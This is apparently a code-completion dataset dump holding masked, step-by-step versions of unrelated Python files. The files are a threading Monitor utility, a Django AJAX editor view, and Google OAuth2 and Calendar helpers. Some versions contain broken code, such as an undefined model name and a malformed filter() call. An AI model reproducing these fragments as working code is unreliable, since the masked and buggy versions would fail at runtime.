atomic insert if not already in set\n\n :param item: item to insert\n :return: whether the item was successfully inserted\n \"\"\"\n with Monitor.acquire(self):\n if item in self:\n return False\n self.add(item)\n return True\n",
"step-2": "<mask token>\n\n\nclass MonitorList(tp.Generic[T], collections.UserList, Monitor):\n \"\"\"\n A list that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args):\n collections.UserList.__init__(self, *args)\n Monitor.__init__(self)\n\n def __copy__(self) ->'MonitorList':\n return MonitorList(copy.copy(self.data))\n\n def __deepcopy__(self, memo) ->'MonitorList':\n return MonitorList(copy.deepcopy(self.data, memo=memo))\n\n def __getitem__(self, item: tp.Union[slice, int]) ->T:\n return self.data[item]\n\n def __setitem__(self, key: int, value: T) ->None:\n self.data[key] = value\n\n def __delitem__(self, key: tp.Union[slice, int]) ->None:\n del self.data[key]\n\n\nclass MonitorDict(tp.Generic[K, V], collections.UserDict, Monitor):\n \"\"\"\n A dict that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n collections.UserDict.__init__(self, *args, **kwargs)\n Monitor.__init__(self)\n\n def __getitem__(self, item: K) ->V:\n return self.data[item]\n\n def __setitem__(self, key: K, value: V) ->None:\n self.data[key] = value\n\n def __delitem__(self, key: K) ->None:\n del self.data[key]\n\n def __copy__(self) ->'MonitorDict':\n return MonitorDict(copy.copy(self.data))\n\n def __deepcopy__(self, memo) ->'MonitorDict':\n return MonitorDict(copy.deepcopy(self.data, memo=memo))\n\n\nclass MonitorSet(set, Monitor):\n \"\"\"\n A set that allows atomic insert-if-not-already-there operation\n \"\"\"\n\n def __init__(self, *args):\n super().__init__(*args)\n Monitor.__init__(self)\n\n def insert_and_check(self, item) ->bool:\n \"\"\"\n Perform an atomic insert if not already in set\n\n :param item: item to insert\n :return: 
whether the item was successfully inserted\n \"\"\"\n with Monitor.acquire(self):\n if item in self:\n return False\n self.add(item)\n return True\n",
"step-3": "<mask token>\n\n\nclass RMonitor(Monitor):\n <mask token>\n\n def __init__(self):\n self._monitor_lock = threading.RLock()\n\n\nclass MonitorList(tp.Generic[T], collections.UserList, Monitor):\n \"\"\"\n A list that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args):\n collections.UserList.__init__(self, *args)\n Monitor.__init__(self)\n\n def __copy__(self) ->'MonitorList':\n return MonitorList(copy.copy(self.data))\n\n def __deepcopy__(self, memo) ->'MonitorList':\n return MonitorList(copy.deepcopy(self.data, memo=memo))\n\n def __getitem__(self, item: tp.Union[slice, int]) ->T:\n return self.data[item]\n\n def __setitem__(self, key: int, value: T) ->None:\n self.data[key] = value\n\n def __delitem__(self, key: tp.Union[slice, int]) ->None:\n del self.data[key]\n\n\nclass MonitorDict(tp.Generic[K, V], collections.UserDict, Monitor):\n \"\"\"\n A dict that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n collections.UserDict.__init__(self, *args, **kwargs)\n Monitor.__init__(self)\n\n def __getitem__(self, item: K) ->V:\n return self.data[item]\n\n def __setitem__(self, key: K, value: V) ->None:\n self.data[key] = value\n\n def __delitem__(self, key: K) ->None:\n del self.data[key]\n\n def __copy__(self) ->'MonitorDict':\n return MonitorDict(copy.copy(self.data))\n\n def __deepcopy__(self, memo) ->'MonitorDict':\n return MonitorDict(copy.deepcopy(self.data, memo=memo))\n\n\nclass MonitorSet(set, Monitor):\n \"\"\"\n A set that allows atomic insert-if-not-already-there operation\n \"\"\"\n\n def __init__(self, *args):\n super().__init__(*args)\n Monitor.__init__(self)\n\n def insert_and_check(self, item) 
->bool:\n \"\"\"\n Perform an atomic insert if not already in set\n\n :param item: item to insert\n :return: whether the item was successfully inserted\n \"\"\"\n with Monitor.acquire(self):\n if item in self:\n return False\n self.add(item)\n return True\n",
"step-4": "<mask token>\n\n\nclass RMonitor(Monitor):\n \"\"\"\n Monitor, but using an reentrant lock instead of a normal one\n \"\"\"\n\n def __init__(self):\n self._monitor_lock = threading.RLock()\n\n\nclass MonitorList(tp.Generic[T], collections.UserList, Monitor):\n \"\"\"\n A list that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args):\n collections.UserList.__init__(self, *args)\n Monitor.__init__(self)\n\n def __copy__(self) ->'MonitorList':\n return MonitorList(copy.copy(self.data))\n\n def __deepcopy__(self, memo) ->'MonitorList':\n return MonitorList(copy.deepcopy(self.data, memo=memo))\n\n def __getitem__(self, item: tp.Union[slice, int]) ->T:\n return self.data[item]\n\n def __setitem__(self, key: int, value: T) ->None:\n self.data[key] = value\n\n def __delitem__(self, key: tp.Union[slice, int]) ->None:\n del self.data[key]\n\n\nclass MonitorDict(tp.Generic[K, V], collections.UserDict, Monitor):\n \"\"\"\n A dict that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n collections.UserDict.__init__(self, *args, **kwargs)\n Monitor.__init__(self)\n\n def __getitem__(self, item: K) ->V:\n return self.data[item]\n\n def __setitem__(self, key: K, value: V) ->None:\n self.data[key] = value\n\n def __delitem__(self, key: K) ->None:\n del self.data[key]\n\n def __copy__(self) ->'MonitorDict':\n return MonitorDict(copy.copy(self.data))\n\n def __deepcopy__(self, memo) ->'MonitorDict':\n return MonitorDict(copy.deepcopy(self.data, memo=memo))\n\n\nclass MonitorSet(set, Monitor):\n \"\"\"\n A set that allows atomic insert-if-not-already-there operation\n \"\"\"\n\n def __init__(self, *args):\n 
super().__init__(*args)\n Monitor.__init__(self)\n\n def insert_and_check(self, item) ->bool:\n \"\"\"\n Perform an atomic insert if not already in set\n\n :param item: item to insert\n :return: whether the item was successfully inserted\n \"\"\"\n with Monitor.acquire(self):\n if item in self:\n return False\n self.add(item)\n return True\n",
"step-5": "import collections\nimport copy\nimport threading\nimport typing as tp\n\nfrom ..decorators.decorators import wraps\n\nfrom ..typing import K, V, T\n\n\nclass Monitor:\n \"\"\"\n Base utility class for creating monitors (the synchronization thingies!)\n\n These are NOT re-entrant!\n\n Use it like that:\n\n >>> class MyProtectedObject(Monitor):\n >>> def __init__(self, *args, **kwargs):\n >>> Monitor.__init__(self)\n >>> ... do your job ..\n\n >>> @Monitor.synchronized\n >>> def function_that_needs_mutual_exclusion(self):\n >>> .. do your threadsafe jobs ..\n\n >>> def function_that_partially_needs_protection(self):\n >>> .. do your jobs ..\n >>> with Monitor.acquire(self):\n >>> .. do your threadsafe jobs ..\n >>> .. do your jobs ..\n >>> with self:\n >>> .. do your threadsafe jobs ..\n \"\"\"\n\n def __enter__(self) -> 'Monitor':\n self._monitor_lock.acquire()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb) -> bool:\n self._monitor_lock.release()\n return False\n\n def __init__(self):\n \"\"\"You need to invoke this at your constructor\n You can also use it to release locks of other objects.\"\"\"\n self._monitor_lock = threading.Lock() # type: threading.Lock\n\n @staticmethod\n def synchronize_on_attribute(attr_name: str):\n \"\"\"\n When a Monitor is an attribute of a class, and you have a method instance\n that you would like secure by acquiring that monitor, use this.\n\n The first argument taken by that method instance must be self.\n\n :param attr_name: name of the attribute that is the monitor\n \"\"\"\n\n def outer(fun):\n @wraps(fun)\n def method(self, *args, **kwargs):\n # noinspection PyProtectedMember\n with getattr(self, attr_name)._monitor_lock:\n return fun(self, *args, **kwargs)\n\n return method\n\n return outer\n\n @staticmethod\n def synchronized(fun: tp.Callable) -> tp.Callable:\n \"\"\"\n This is a decorator. Class method decorated with that will lock the\n global lock of given instance, making it threadsafe. 
Depending on\n usage pattern of your class and it's data semantics, your performance\n may vary\n \"\"\"\n\n @wraps(fun)\n def monitored(*args, **kwargs):\n # noinspection PyProtectedMember\n with args[0]._monitor_lock:\n return fun(*args, **kwargs)\n\n return monitored\n\n class release:\n \"\"\"\n Returns a context manager object that can release another object\n as long as that object is a monitor.\n\n Consider foo, which is a monitor. You have a protected function,\n but you feel that you can release it for a while as it would\n improve parallelism. You can use it as such:\n\n >>> @Monitor.synchronized\n >>> def protected_function(self):\n >>> .. do some stuff that needs mutual exclusion ..\n >>> with Monitor.release(self):\n >>> .. do some I/O that does not need mutual exclusion ..\n >>> .. back to protected stuff ..\n \"\"\"\n __slots__ = ('foo',)\n\n def __init__(self, foo: 'Monitor'):\n self.foo = foo\n\n def __enter__(self) -> None:\n # noinspection PyProtectedMember\n self.foo._monitor_lock.release()\n\n def __exit__(self, e1, e2, e3) -> bool:\n # noinspection PyProtectedMember\n self.foo._monitor_lock.acquire()\n return False\n\n class acquire:\n \"\"\"\n Returns a context manager object that can lock another object,\n as long as that object is a monitor.\n\n Consider foo, which is a monitor. If you needed to lock it from\n outside, you would do:\n\n >>> with Monitor.acquire(foo):\n >>> .. 
do operations on foo that need mutual exclusion ..\n \"\"\"\n __slots__ = ('foo',)\n\n def __init__(self, foo: 'Monitor'):\n self.foo = foo\n\n def __enter__(self) -> None:\n # noinspection PyProtectedMember\n self.foo._monitor_lock.acquire()\n\n def __exit__(self, e1, e2, e3) -> bool:\n # noinspection PyProtectedMember\n self.foo._monitor_lock.release()\n return False\n\n @classmethod\n def synchronize_on(cls, monitor: 'Monitor') -> tp.Callable[[tp.Callable], tp.Callable]:\n \"\"\"\n A decorator for locking on non-self Monitor objects\n\n Use it like:\n\n >>> class MasterClass(Monitor):\n >>> def get_object(self):\n >>> class SlaveClass:\n >>> @Monitor.synchronize_on(self)\n >>> def get_object(self2):\n >>> ...\n >>> return SlaveClass\n \"\"\"\n\n def outer(fun):\n @wraps(fun)\n def inner(*args, **kwargs):\n with cls.acquire(monitor):\n return fun(*args, **kwargs)\n\n return inner\n\n return outer\n\n\nclass RMonitor(Monitor):\n \"\"\"\n Monitor, but using an reentrant lock instead of a normal one\n \"\"\"\n\n def __init__(self):\n self._monitor_lock = threading.RLock() # type: threading.RLock\n\n\nclass MonitorList(tp.Generic[T], collections.UserList, Monitor):\n \"\"\"\n A list that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args):\n collections.UserList.__init__(self, *args)\n Monitor.__init__(self)\n\n def __copy__(self) -> 'MonitorList':\n return MonitorList(copy.copy(self.data))\n\n def __deepcopy__(self, memo) -> 'MonitorList':\n return MonitorList(copy.deepcopy(self.data, memo=memo))\n\n def __getitem__(self, item: tp.Union[slice, int]) -> T:\n return self.data[item]\n\n def __setitem__(self, key: int, value: T) -> None:\n self.data[key] = value\n\n def __delitem__(self, key: tp.Union[slice, int]) -> None:\n del self.data[key]\n\n\nclass MonitorDict(tp.Generic[K, V], 
collections.UserDict, Monitor):\n \"\"\"\n A dict that is also a monitor.\n\n Note that access to it's properties is not automatically synchronized, you got to\n invoke the monitor to implement an opportunistic locking of your own choice\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n collections.UserDict.__init__(self, *args, **kwargs)\n Monitor.__init__(self)\n\n def __getitem__(self, item: K) -> V:\n return self.data[item]\n\n def __setitem__(self, key: K, value: V) -> None:\n self.data[key] = value\n\n def __delitem__(self, key: K) -> None:\n del self.data[key]\n\n def __copy__(self) -> 'MonitorDict':\n return MonitorDict(copy.copy(self.data))\n\n def __deepcopy__(self, memo) -> 'MonitorDict':\n return MonitorDict(copy.deepcopy(self.data, memo=memo))\n\n\nclass MonitorSet(set, Monitor):\n \"\"\"\n A set that allows atomic insert-if-not-already-there operation\n \"\"\"\n\n def __init__(self, *args):\n super().__init__(*args)\n Monitor.__init__(self)\n\n def insert_and_check(self, item) -> bool:\n \"\"\"\n Perform an atomic insert if not already in set\n\n :param item: item to insert\n :return: whether the item was successfully inserted\n \"\"\"\n with Monitor.acquire(self):\n if item in self:\n return False\n self.add(item)\n return True\n",
"step-ids": [
17,
20,
22,
23,
33
]
}
|
[
17,
20,
22,
23,
33
] |
<|reserved_special_token_0|>
class AjaxableResponseMixin:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):
form_class = EditorTextForm
model = EditorText
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['recent_texts'] = EditorText.objects.filter(created_by=self
.request.user)[:5]
return context
def get_object(self):
pk = self.request.POST.get('pk')
if not pk:
return None
return EdidorText.objects.get(pk=int(pk))
def form_valid(self, form):
form.instance.created_by = self.request.user
return super().form_valid(form)
def get_form_kwargs(self):
"""Return the keyword arguments for instantiating the form."""
self.object = self.get_object()
kwargs = super().get_form_kwargs()
return kwargs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class AjaxableResponseMixin:
<|reserved_special_token_0|>
def form_invalid(self, form):
response = super().form_invalid(form)
if self.request.is_ajax():
return JsonResponse(form.errors, status=400)
else:
return response
<|reserved_special_token_0|>
class EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):
form_class = EditorTextForm
model = EditorText
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['recent_texts'] = EditorText.objects.filter(created_by=self
.request.user)[:5]
return context
def get_object(self):
pk = self.request.POST.get('pk')
if not pk:
return None
return EdidorText.objects.get(pk=int(pk))
def form_valid(self, form):
form.instance.created_by = self.request.user
return super().form_valid(form)
def get_form_kwargs(self):
"""Return the keyword arguments for instantiating the form."""
self.object = self.get_object()
kwargs = super().get_form_kwargs()
return kwargs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class AjaxableResponseMixin:
<|reserved_special_token_0|>
def form_invalid(self, form):
response = super().form_invalid(form)
if self.request.is_ajax():
return JsonResponse(form.errors, status=400)
else:
return response
def form_valid(self, form):
response = super().form_valid(form)
if self.request.is_ajax():
data = {'pk': self.object.pk}
return JsonResponse(data)
else:
return response
class EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):
form_class = EditorTextForm
model = EditorText
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['recent_texts'] = EditorText.objects.filter(created_by=self
.request.user)[:5]
return context
def get_object(self):
pk = self.request.POST.get('pk')
if not pk:
return None
return EdidorText.objects.get(pk=int(pk))
def form_valid(self, form):
form.instance.created_by = self.request.user
return super().form_valid(form)
def get_form_kwargs(self):
"""Return the keyword arguments for instantiating the form."""
self.object = self.get_object()
kwargs = super().get_form_kwargs()
return kwargs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class AjaxableResponseMixin:
"""
Mixin to add AJAX support to a form.
Must be used with an object-based FormView (e.g. CreateView)
"""
def form_invalid(self, form):
response = super().form_invalid(form)
if self.request.is_ajax():
return JsonResponse(form.errors, status=400)
else:
return response
def form_valid(self, form):
response = super().form_valid(form)
if self.request.is_ajax():
data = {'pk': self.object.pk}
return JsonResponse(data)
else:
return response
class EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):
form_class = EditorTextForm
model = EditorText
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['recent_texts'] = EditorText.objects.filter(created_by=self
.request.user)[:5]
return context
def get_object(self):
pk = self.request.POST.get('pk')
if not pk:
return None
return EdidorText.objects.get(pk=int(pk))
def form_valid(self, form):
form.instance.created_by = self.request.user
return super().form_valid(form)
def get_form_kwargs(self):
"""Return the keyword arguments for instantiating the form."""
self.object = self.get_object()
kwargs = super().get_form_kwargs()
return kwargs
<|reserved_special_token_1|>
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import JsonResponse
from django.views.generic import CreateView, UpdateView, ListView, \
DeleteView, TemplateView
from example.forms import EditorTextForm
from example.models import EdidorText
class AjaxableResponseMixin:
    """
    Mixin to add AJAX support to a form.

    Must be used with an object-based FormView (e.g. CreateView).
    """

    def form_invalid(self, form):
        """On AJAX requests, answer with the form errors as JSON (HTTP 400)."""
        response = super().form_invalid(form)
        if not self.request.is_ajax():
            return response
        return JsonResponse(form.errors, status=400)

    def form_valid(self, form):
        """On AJAX requests, answer with the saved object's pk as JSON."""
        # Run the parent first: for CreateView this saves the form and
        # populates self.object, which we report back below.
        response = super().form_valid(form)
        if not self.request.is_ajax():
            return response
        return JsonResponse({'pk': self.object.pk})
class EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):
    """Home view for creating (or AJAX-updating) editor texts.

    ``get_form_kwargs`` resolves ``self.object`` from a POSTed ``pk`` so
    the same view can update an existing text instead of always creating
    a new one.
    """
    form_class = EditorTextForm
    # BUG FIX: the original referenced an undefined ``EditorText`` name;
    # the model imported from example.models is spelled ``EdidorText``
    # (sic), so the undefined name raised NameError at import time.
    model = EdidorText

    def get_context_data(self, **kwargs):
        """Add the user's five most recent texts to the template context."""
        context = super().get_context_data(**kwargs)
        context['recent_texts'] = EdidorText.objects.filter(
            created_by=self.request.user
        )[:5]
        return context

    def get_object(self):
        """Return the text identified by the POSTed ``pk``, or None."""
        # ``pk`` arrives in the POST body (AJAX), not in the URL.
        pk = self.request.POST.get('pk')
        if not pk:
            return None
        return EdidorText.objects.get(pk=int(pk))

    def form_valid(self, form):
        # Stamp ownership before the mixin/CreateView chain saves the form.
        form.instance.created_by = self.request.user
        return super().form_valid(form)

    def get_form_kwargs(self):
        """Return the keyword arguments for instantiating the form."""
        self.object = self.get_object()
        kwargs = super().get_form_kwargs()
        return kwargs
|
flexible
|
{
"blob_id": "87a4fcb26464925952dde57fecf4709f01e9fed7",
"index": 9916,
"step-1": "<mask token>\n\n\nclass AjaxableResponseMixin:\n <mask token>\n <mask token>\n <mask token>\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(created_by=self\n .request.user)[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-2": "<mask token>\n\n\nclass AjaxableResponseMixin:\n <mask token>\n\n def form_invalid(self, form):\n response = super().form_invalid(form)\n if self.request.is_ajax():\n return JsonResponse(form.errors, status=400)\n else:\n return response\n <mask token>\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(created_by=self\n .request.user)[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-3": "<mask token>\n\n\nclass AjaxableResponseMixin:\n <mask token>\n\n def form_invalid(self, form):\n response = super().form_invalid(form)\n if self.request.is_ajax():\n return JsonResponse(form.errors, status=400)\n else:\n return response\n\n def form_valid(self, form):\n response = super().form_valid(form)\n if self.request.is_ajax():\n data = {'pk': self.object.pk}\n return JsonResponse(data)\n else:\n return response\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(created_by=self\n .request.user)[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-4": "<mask token>\n\n\nclass AjaxableResponseMixin:\n \"\"\"\n Mixin to add AJAX support to a form.\n\n Must be used with an object-based FormView (e.g. CreateView)\n \"\"\"\n\n def form_invalid(self, form):\n response = super().form_invalid(form)\n if self.request.is_ajax():\n return JsonResponse(form.errors, status=400)\n else:\n return response\n\n def form_valid(self, form):\n response = super().form_valid(form)\n if self.request.is_ajax():\n data = {'pk': self.object.pk}\n return JsonResponse(data)\n else:\n return response\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(created_by=self\n .request.user)[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-5": "from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http import JsonResponse\nfrom django.views.generic import CreateView, UpdateView, ListView, \\\n DeleteView, TemplateView\n\nfrom example.forms import EditorTextForm\nfrom example.models import EdidorText\n\n\nclass AjaxableResponseMixin:\n \"\"\"\n Mixin to add AJAX support to a form.\n\n Must be used with an object-based FormView (e.g. CreateView)\n \"\"\"\n\n def form_invalid(self, form):\n response = super().form_invalid(form)\n if self.request.is_ajax():\n return JsonResponse(form.errors, status=400)\n else:\n return response\n\n def form_valid(self, form):\n # We make sure to call the parent's form_valid() method because\n # it might do some processing (in the case of CreateView, it will\n # call form.save() for example).\n response = super().form_valid(form)\n if self.request.is_ajax():\n data = {\n 'pk': self.object.pk,\n }\n return JsonResponse(data)\n else:\n return response\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(\n created_by=self.request.user\n )[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-ids": [
7,
8,
9,
10,
12
]
}
|
[
7,
8,
9,
10,
12
] |
<|reserved_special_token_0|>
def get_certs_keys(kid):
    """Fetch Google's OAuth2 JWKS and return the key whose ``kid`` matches.

    :param kid: key id taken from a JWT header
    :return: the matching JWK dict, or None if no key has that id
    """
    url = 'https://www.googleapis.com/oauth2/v3/certs'
    data = requests.get(url).json()['keys']
    # BUG FIX: the original called filter() without the iterable argument
    # (``filter(lambda e: ...)``), which raises TypeError at runtime.
    return next((key for key in data if key['kid'] == kid), None)
def get_redirect_link(realid=None):
    """Build the Google OAuth2 consent-screen URL for this app.

    A random ``state`` value is generated and registered so the OAuth
    callback can be validated later; ``realid`` (an existing internal
    user id, if any) is stored alongside it.
    """
    state = util.generate_id(50)
    certificate.register_state(state, 'google_oauth', {'realid': realid})
    query_parts = (
        f'client_id={client_id}',
        f"include_granted_scopes={'true'}",
        f'redirect_uri={redirect_uri}',
        f'scope={scope}',
        f'access_type={access_type}',
        f'state={state}',
        f'prompt={prompt}',
        f'response_type={response_type}',
    )
    return 'https://accounts.google.com/o/oauth2/v2/auth?' + '&'.join(query_parts)
def code_to_refresh_token(code):
    """Exchange an OAuth2 authorization code for tokens.

    :param code: the authorization code returned by Google's consent page
    :return: ``(profile, tokens)`` — the decoded id_token payload and the
        full token response dict
    """
    payload = {
        'code': code,
        'client_id': client_id,
        'client_secret': settings.google.google_client_secret(),
        'redirect_uri': redirect_uri,
        'grant_type': 'authorization_code',
    }
    tokens = requests.post('https://oauth2.googleapis.com/token', payload).json()
    _header, profile = decode_id_token(tokens['id_token'])
    return profile, tokens
def decode_base64_padding(s):
    """Decode a URL-safe base64 string, restoring any stripped ``=`` padding."""
    padding = '=' * (-len(s) % 4)
    return base64.urlsafe_b64decode(s + padding).decode()
<|reserved_special_token_0|>
def register(profile, tokens, realid=None):
    """Persist a Google profile (merged with its tokens) for a user.

    With ``realid`` given, the google connection is attached to that
    existing user document; otherwise a brand-new user document is
    created with google as its only connection.
    """
    profile.update(tokens)
    # Look up whether this google account is already linked to the user.
    already_linked = users_db.find_one({
        '_id': ObjectId(realid),
        'connections.google.sub': profile['sub'],
    })
    if realid:
        users_db.update_one(
            {'_id': ObjectId(realid)},
            {
                '$set': {'connections.google': profile},
                # Only bump the connection count when google was not
                # already linked to this user.
                '$inc': {'connections.length': 0 if already_linked else 1},
            },
        )
        print('add google info')
    else:
        users_db.insert_one({'connections': {'google': profile, 'length': 1}})
        print('connect with google')
def refresh_token(refresh_token):
    """Obtain a fresh token response from Google using a refresh token.

    NOTE(review): the parameter deliberately keeps the original name even
    though it shadows this function — callers may pass it by keyword.
    """
    payload = {
        'client_id': client_id,
        'client_secret': settings.google.google_client_secret(),
        'refresh_token': refresh_token,
        'grant_type': 'refresh_token',
    }
    return requests.post('https://oauth2.googleapis.com/token', payload).json()
def verify_access_token(access_token):
    """Return True when Google's tokeninfo endpoint accepts the token."""
    response = requests.get(
        f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}'
    )
    return response.status_code == 200
def get_access_token(google_user_id):
    """Return a usable access token for the google user, refreshing if stale.

    :param google_user_id: google ``sub`` identifier
    """
    record = Just(users_db.find_one({'connections.google.sub': google_user_id}))
    access_token = record.connections.google.access_token()
    stored_refresh = record.connections.google.refresh_token()
    # A refresh token is mandatory: without one an expired access token
    # could never be renewed.
    assert stored_refresh
    if not (access_token and verify_access_token(access_token)):
        # Stored token missing or rejected — mint a new one.
        return Just(refresh_token(stored_refresh)).access_token()
    return access_token
def get_real_user_id(user_id):
    """Map a google ``sub`` id to the internal user document id (as str)."""
    document = users_db.find_one({'connections.google.sub': user_id})
    return str(document['_id'])
def get_google_user_id(real_user_id):
    """Return the google ``sub`` id stored for the given internal user id.

    :param real_user_id: internal user document id (str)
    :raises RuntimeError: when the user has no google connection
    """
    data = Just(users_db.find_one({'_id': ObjectId(real_user_id)}))
    # BUG FIX: the original tested for a 'line' connection while reading
    # the 'google' one (apparent copy-paste from a LINE variant); the
    # guard must match the connection actually returned.
    if data() and 'google' in data.connections():
        return data.connections.google.sub()
    raise RuntimeError(f'no google connection for user {real_user_id}')
def add_event(real_user_id, start, end, options=None):
    """Insert an event into the user's primary Google Calendar.

    :param real_user_id: internal user id (mapped to a google account)
    :param start: event start as an RFC3339 datetime string
    :param end: event end as an RFC3339 datetime string
    :param options: extra event fields (e.g. summary/description);
        defaults to empty summary/description
    :return: True when the Calendar API accepted the event
    """
    endpoint = 'https://www.googleapis.com/calendar/v3/calendars/primary/events'
    # BUG FIX: the default was a mutable dict literal in the signature,
    # which is shared across calls; build the default per call instead.
    if options is None:
        options = {'summary': '', 'description': ''}
    body = {
        'start': {'dateTime': start, 'timeZone': 'Asia/Tokyo'},
        'end': {'dateTime': end, 'timeZone': 'Asia/Tokyo'},
    }
    body.update(options)
    token = get_access_token(get_google_user_id(real_user_id))
    response = requests.post(
        endpoint,
        json=body,
        headers={
            'content-type': 'application/json',
            'authorization': f'Bearer {token}',
        },
    )
    ok = response.status_code == 200
    if not ok:
        print(response.text)
    return ok
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_certs_keys(kid):
    """Fetch Google's OAuth2 JWKS and return the key whose ``kid`` matches.

    :param kid: key id taken from a JWT header
    :return: the matching JWK dict, or None if no key has that id
    """
    url = 'https://www.googleapis.com/oauth2/v3/certs'
    data = requests.get(url).json()['keys']
    # BUG FIX: the original called filter() without the iterable argument
    # (``filter(lambda e: ...)``), which raises TypeError at runtime.
    return next((key for key in data if key['kid'] == kid), None)
def get_redirect_link(realid=None):
state = util.generate_id(50)
certificate.register_state(state, 'google_oauth', {'realid': realid})
return ('https://accounts.google.com/o/oauth2/v2/auth?' +
f'client_id={client_id}&' + f"include_granted_scopes={'true'}&" +
f'redirect_uri={redirect_uri}&' + f'scope={scope}&' +
f'access_type={access_type}&' + f'state={state}&' +
f'prompt={prompt}&' + f'response_type={response_type}')
def code_to_refresh_token(code):
endpoint = 'https://oauth2.googleapis.com/token'
tokens = requests.post(endpoint, {'code': code, 'client_id': client_id,
'client_secret': settings.google.google_client_secret(),
'redirect_uri': redirect_uri, 'grant_type': 'authorization_code'}
).json()
header, profile = decode_id_token(tokens['id_token'])
return profile, tokens
def decode_base64_padding(s):
return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()
def decode_id_token(id_token):
s = id_token.split('.')
header = json.loads(decode_base64_padding(s[0]))
payload = json.loads(decode_base64_padding(s[1]))
return header, payload
def register(profile, tokens, realid=None):
profile.update(tokens)
user = users_db.find_one({'_id': ObjectId(realid),
'connections.google.sub': profile['sub']})
if realid:
